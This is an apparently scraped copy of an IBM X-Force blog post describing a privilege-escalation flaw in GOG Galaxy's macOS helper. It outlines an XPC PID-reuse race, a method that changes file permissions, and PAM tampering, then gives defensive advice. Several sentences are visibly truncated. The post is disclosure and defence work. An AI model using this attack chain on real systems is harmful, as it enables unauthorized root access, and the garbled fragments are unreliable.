Being part of the Adversary Services team at IBM, it is important to keep your skills up to date and learn new things constantly.
MacOS security was one field where I decided to put more effort this year to further improve my exploitation and operation skills in macOS environments.
When GOG Galaxy is installed, it creates a new file in the /Library/LaunchDaemons directory with the name of com.
Usually, these processes are used as helper tools to perform privileged actions by a low privileged application.
Inspecting the PLIST file created by GOG Galaxy, it shows that an XPC service named com.
ClientService is exposed by the Privileged Helper tool located in /Library/PrivilegedHelperTools/com.
In macOS, PIDs can be reused and we can even replace current executables with a different process with posix spawn() while keeping the old PID. This was originally published on Warcon 18 in the presentation, Don't Trust the PID. This attack is based on a race condition where an exploit is going to send several messages to the XPC service and just after that, execute posix spawn with the binary that fulfills all the security requirements to replace the malicious binary PID. By queuing a lot of messages, the time between the message processing and process validation will allow the exploit to replace the exploit PID with the real application validating the connection.
Although we can manipulate the Privileged Helper and invoke any exposed methods, it is not useful unless these methods offer an opportunity for exploitation.
The protocol used between the XPC service and client was called ClientServiceProtocol.
As a low-privileged user, we can communicate with the XPC service and change the permissions of any file in the system.
D/login file is a configuration file for the Pluggable Authentication Modules system on macOS. It contains the default authentication configuration for all services that use PAM. Modifying the auth entries to use the pam permit.
Connect to the XPC through forked processes and replace the child processes with the legitimate binary.
Call the changeFolderPermissionsAtPath method that is exposed by the XPC modifying permissions of the /etc/pam.
Adversaries abuse XPC services to execute malicious code, perform application white-listing bypass, and escalate privileges.
On macOS, applications can leverage XPC services to send messages to the XPC service daemon, which runs with root privileges on the system.
These attacks often take advantage of improper XPC client validation and poor input validation to allow code to be executed with elevated privileges.
Securing XPC can be challenging as it requires secure coding practices from the application vendor such as enabling the hardened runtime for XPC services and notarizing the application.
Organizations can and should look for unsigned XPC client services and understand the risks associated with their operation in the environment.
Monitoring for processes that make suspicious calls to processes with elevated privileges could be an early indication of this type of attack.
To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence, or offensive security services schedule a meeting here.
This Cyber News was published on securityintelligence.com. Publication date: Thu, 07 Dec 2023 20:43:06 +0000